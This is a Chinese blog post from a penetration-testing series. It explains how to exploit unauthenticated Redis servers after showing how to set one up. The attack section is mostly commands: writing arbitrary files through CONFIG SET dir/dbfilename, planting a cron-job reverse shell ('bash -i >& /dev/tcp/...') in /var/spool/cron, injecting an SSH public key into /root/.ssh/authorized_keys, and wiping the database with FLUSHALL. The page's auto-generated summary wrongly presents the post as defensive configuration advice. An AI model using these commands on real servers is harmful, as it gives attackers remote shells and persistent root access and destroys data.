打点-进入内网(二)

最新推荐文章于 2024-08-25 07:55:33 发布
最新推荐文章于 2024-08-25 07:55:33 发布
阅读量623 收藏 1
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44555676/article/details/119963238
版权
本文介绍了如何在Ubuntu上搭建Redis服务器,并详细阐述了如何通过配置Redis来防止未授权访问,包括设置访问密码、开启远程访问、写入文件、反弹shell等操作。同时,还提醒了Redis服务器可能存在的安全风险,如不恰当的配置可能导致数据泄露或恶意操作。
摘要由CSDN通过智能技术生成

未授权访问漏洞


前言

这类问题覆盖的应用、利用方式较广,因此只举例频次较高的漏洞。

一、Redis

Redis是一个开源的使用ANSI C语言编写、支持网绍、可基于内存亦可持久化的日志型、Key-Value数据库。

1.Ubuntu中搭建Redis服务器

安装

sudo apt-get install redis-server

在这里插入图片描述
安装完成后,Redis服务器会自动启动,我们检查Redis服务器程序

检查Redis服务器系统进程

ps -aux|grep redis

在这里插入图片描述

通过启动命令检查Redis服务器状态

netstat -nlt|grep 6379

在这里插入图片描述

sudo /etc/init.d/redis-server status

在这里插入图片描述

通过命令行客户端访问Redis

安装Redis服务器,会自动地一起安装Redis命令行客户端程序。
在本机输入redis-cli命令就可以启动,客户端程序访问Redis服务器。

redis-cli

在这里插入图片描述
在这里插入图片描述

查看所有的key列表

keys *

在这里插入图片描述
测试存储数据

set root hello-redis
get root

在这里插入图片描述

修改Redis的配置

使用Redis的访问账号
默认情况下,访问Redis服务器是不需要密码的,为了增加安全性我们需要设置Redis服务器的访问密码。设置访问密码为root。

用vi打开Redis服务器的配置文件redis.conf

sudo vi /etc/redis/redis.conf

#取消注释requirepass
requirepass root

在这里插入图片描述
让Redis服务器被远程访问
默认情况下,Redis服务器不允许远程访问,只允许本机访问,所以我们需要设置打开远程访问的功能。

用vi打开Redis服务器的配置文件redis.conf

sudo vi /etc/redis/redis.conf

#注释bind
#bind 127.0.0.1

在这里插入图片描述修改后,重启Redis服务器

sudo /etc/init.d/redis-server restart

在这里插入图片描述
未使用密码登陆Redis服务器

redis-cli
keys *

在这里插入图片描述
发现可以登陆,但无法执行命令了
登陆Redis服务器,输入密码

redis-cli -a root

在这里插入图片描述
登陆后,一切正常

我们检查Redis的网络监听端口
检查Redis服务器占用端口

netstat -nlt|grep 6379

在这里插入图片描述
我们看到网络监听从之前的 127.0.0.1:6379 变成 0 0.0.0.0:6379,表示Redis已经允许远程登陆访问

2.Kall下redis-cli的安装

下载redis-cli

wget http://download.redis.io/redis-stable.tar.gz
ls

在这里插入图片描述
解压缩

tar -zxvf redis-stable.tar.gz

在这里插入图片描述
简易配置

cd redis-stable 
make //全局生效 
cp src/redis-cli /usr/bin/

在这里插入图片描述
在这里插入图片描述

查看redis-cli的使用说明

redis-cli -h

在这里插入图片描述
常规连接指令

redis-cli -h 目标主机IP地址 -p  端口号

在这里插入图片描述

3.写入文件

Config Get 命令用于获取 redis 服务的配置参数

CONFIG GET dir

在这里插入图片描述
Config Set 命令可以动态地调整 Redis 服务器的配置(configuration)而无须重启

config set dir /tmp/

在这里插入图片描述
SET 命令用于设置给定 key 的值
如果 key 已经存储其他值, SET 就覆写旧值,且无视类型

set foobar "who are you? Rvn0xsy"

在这里插入图片描述

CONFIG GET dbfilename

在这里插入图片描述

CONFIG SET dbfilename write_file.log

在这里插入图片描述
保存

save

在这里插入图片描述

4.反弹shell - Linux

127.0.0.1:6379> set shell "\n* * * * * bash -i >& /dev/tcp/192.168.70.11/88 0>&1\n"
OK
127.0.0.1:6379> config set dir /var /spool/cron/
OK
127.0.0.1:6379>config set dbfilename root
OK
127.0.0.1:6379>save
[238]28 May 16∶29∶53.276 * DB saved on disk
OK

5.写入公钥

生成公钥:

$ ssh-keygen -t rsa

在这里插入图片描述

127.0.0.1:6379> config set dir /root/ .ssh/
OK
127.0.0.1:6379> config set dbfilename authorized_keys
OK
127.0.0.1:6379> set x " \n\n\nssh-rsa XXXXXX root@kali\n\n\n"
OK
127.0.0.1:6379>save
OK

6.清空数据库

192.168.70.144:6379> FLUSHALL
Y小短腿
关注
专栏目录
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
08-18 1832
实战|手把手教你如何进行内网渗透 x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关
内网渗透--对不出网目标的打法
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1680
配置网络 在VM虚拟机中按照下边的网络拓扑进行配置网络。网络拓扑图如下: win7具有双网卡,其中外网ip是192.168.8.133,内网网段是52。三台机器彼此互通,但是win server 2008和win2003不通外网。用我mac作为攻击机,来对这个靶场环境进行渗透测试。 外网打点 在win7这台靶机上,使用PHPStudy让网站可以运行起来。在攻击机上,访问http://192.168.8.133可以看到是一个phpStudy 探针。对这网站进行渗透,因为本文主要写在内网渗透过程..
打点-进入内网(一)
qq_44555676的博客
08-24 837
应用系统漏洞利用常见漏洞扫描1.Nmap扫描技巧2.impacket框架之mssql服务器安全检测mssglclient与其他工具相比的优势Mssqlclient的基本使用命令为Impacket网络协议工具包安装举例分析几种实际使用情况3.读入数据 常见漏洞扫描 1.Nmap扫描技巧 auth 处理身份验证 broadcast 网络广播 brute 暴力猜解 default 默认 discovery 服务发现 dos 拒绝服务 exploit 漏洞利用 external 外部扩展 fuzzer 模糊测
打点-进入内网(三)
qq_44555676的博客
09-07 753
未授权漏洞之Redis一、计划任务反弹shell、写入公钥1.获取rsa2.将公钥写入foo .txt,注意内容前后要加2个换行3.将foo. txt放入键crackit里4.连接目标5.设置目标的redis的配置文件6.设置数据库备份目录为/root/ .ssh/7.设置数据库备份文件名为authorized_keys8.此时公钥成功写入目标机子,文件名为authorized_keys9.利用私钥链接目标 一、计划任务反弹shell 利用计划任务执行命令反弹shell 在redis以root权限运行
打点渗透之内网渗透基础知识打底-让你更好的明白什么是渗透测试什么是侵入性打点渗透 高阶渗透知识点 简单易懂
最新发布
zhzx123aa的专栏
08-25 5047
同样,各个域之间的账号也将更具被设置的访问控制要求,获得域树中各域间的访问权限{这个也是涉及到对子域的权限控制以及平行域的控制},实现了更为有效的资源管理和共享调度。在域树中的域名和我们使用浏览器访问网站的域名是十分的相似,在浏览器访问的过程中,我们需要域名服务也就是DNS来实现域名和与之对应的IP之间的转换。它存储了当前域中的全部用户名,密码以及属性这个域的计算机列表信息,并利用这些信息对连入域中的主机域用户进行认证。可能会存在多个域控主机独立光纤的域,这些域就会形成域树,或者域森林。
内网自动化快速打点工具
weixin_46211944的博客
12-28 208
自定义Password字典 自动合并到程序内置。服务弱口令探测模块 支持 Redis 未授权。服务弱口令探测模块 支持 Mongodb。服务弱口令探测模块 支持 Oracle。服务弱口令探测模块 支持 Mysql。服务弱口令探测模块 支持 Mssql。服务弱口令探测模块 支持 SSH。服务弱口令探测模块 支持 FTP。服务弱口令探测模块 支持 SMB。解析Xray POC V1模版。ICMP并发探测存活IP。集成Xray POC扫描。并发探测主机服务弱口令。并发探测主机端口服务。内网自动化快速打点工具。
内网安全学习从入门到入狱-知识-内网信息探测与收集
god_Zeo的安全博客
03-14 997
内网安全学习从入门到入狱-知识-内网信息收集 内网信息收集-工作组和域内基本信息收集内网安全学习从入门到入狱-知识-内网信息收集0x01本机检查--先看看我是谁查询并开启远程连接服务0x02域内信息收集查询当前额权限判断是否有域查找域控获取域内的用户信息0x03 域内网存活主机的探测主机存活扫描域内端口扫描PowerSploit 中的 Invoke-Portscan.ps1 脚本 前提准备 本...
内网渗透-项目六外围打点
qq_50643984的博客
03-18 2424
1.外围打点 1.1拓补图 1.2发现主机 arp-scan -l 可以发现目标ip为192.168.31.138,nmap扫描端口,接下来绑定hosts域名,访问目标网站。 nmap -p- -sC -sV -O 192.168.31.138 -oA ip_port 注:-p为指定端口,可以先用masscan扫描开发端口,再用nmap。 绑定hosts,目标域名是www.webhack123.com vim /etc/hosts 直接按照图中添加就可以了。 1.3网站目录扫描 打开网站发现没有什
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1338
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
记一次某单位的内网渗透测试
黑战士的博客
06-20 720
网卡信息、补丁信息、杀毒进程、用户在线情况、是否存在域、翻文件查找数据库密码、浏览器保存密码、查看路由等。使用越权加文件上传拿到shell。192.168.xx.x 管理员。通过哥斯拉上线msf。
内网渗透——红日靶机学习(一)
jammny
11-13 6378
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
通过边界代理一路打到三层内网+后渗透通用手法
渗透测试研究中心
11-02 7466
外网进内网通常就是通过web漏洞拿取shell内网的很大一部分信息收集是围绕网络拓扑图展开的。可以社工运维或者google找一下。内网扩散信息收集概述内网信息收集内网网端信息:对内网进行拓扑、分区内网大小内网核心业务信息oa系统、邮件服务器、监控系统....其他Windows、linux主机信息收集内网信息收集做的越好,打的越快常用方法主动扫描。常用工具: nmap,netdiscover,nc...
内网渗透思路08之常规外网打点拿下域控
划水的小白白
05-24 4303
这是一个完整的内网域渗透测试实例,从外网打到内网域控,使用技巧包括但不局限于,子域名碰撞测试 python编写渗透工具 用metasploit获取域控的ntml 明文 凭据 定位域控 制作白银票据 制作黄金票据 跨路由渗透 内网横行渗透 域控权限维持 cobaltscritke渗透内网域控等多种域渗透技巧。
ATT&CK实战系列-从web打点内网渗透
weixin_53884648的博客
10-14 1845
从搭建环境到shell连接,我们从外网到达内网,从内网cs上线,到横向移动,派生等
三层内网 外网打点内网域 sec123 复现
qq_53742230的博客
08-26 4105
本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点,详细介绍外网各种打点方法。jsp 代码审计编写解密脚本frp 端口映射的使用fscan 内网扫描器的使用cobalt strike 的使用hydra 爆破神器的使用1433 MSSQL 爆破MSSQL 执行cmd命令。...
轻松搭建从web打点内网穿透简易实验环境
markecheng的博客
11-24 549
标题:内网环境搭建,实现从web打点内网穿透基础环境 前言: 各位师傅们好,这是我的第一篇文章,我做一个自我介绍,我叫phononer,是一个小白,会将一些自己在内网搭环境实战中呢,遇到的一些坑和操作,将会全部展示出来,希望给各位看到这篇文章的师傅们一些小小帮助,没有帮助,那就是师傅们功力太高深了,如果有帮助呢,在下不胜荣幸。 在现实中,我们很少能在工作中获得权限去打内网,所以,我会一步一步的从最简单的内网环境搭建,到内网穿透,再到域环境等等,一步步的展示。 内网环境搭建使用机器以及网络条件: windo
网络安全之信息收集/打点技术
北冥同学的成长记录笔记
07-09 1603
《孙子兵法》中写道:知己知彼,百战不殆。信息收集是网络攻击或是渗透测试中的第一步,也是最关键的阶段,同时也是耗费时间最长的阶段。换句话说:渗透测试/网络攻击的本质就是信息收集。
初学内网横向命令执行
The current road is different, love needs to distinguish between right and wrong
12-24 1286
简介 横向移动,根据定义是指获取内网某台机器的控制权之后,以被攻陷主机为跳板,通过搜集域内凭证,找办法访问到域内其他机器,再依次循环往复,直到获得域控权限甚至控制内网。 1.IPC 计划任务横向 IPC共享命名管道的资源,是为了实现进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,使用139、445端口。建立向目标主机的IPC$连接,把命令执行的脚本传到目标主机,创建计划任务在目标机器上执行命令脚本。 1、目标主机开启了139和445端口; 2、目标主机开启了ipc$默认
uni-app地图打点
07-28
在uni-app中实现地图打点功能,你可以使用uni-app的原生API结合第三方地图插件来实现。以下是一种常见的实现方法: 1. 首先,在uni-app项目中安装并引入第三方地图插件,例如腾讯地图或百度地图。你可以通过uni-app...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值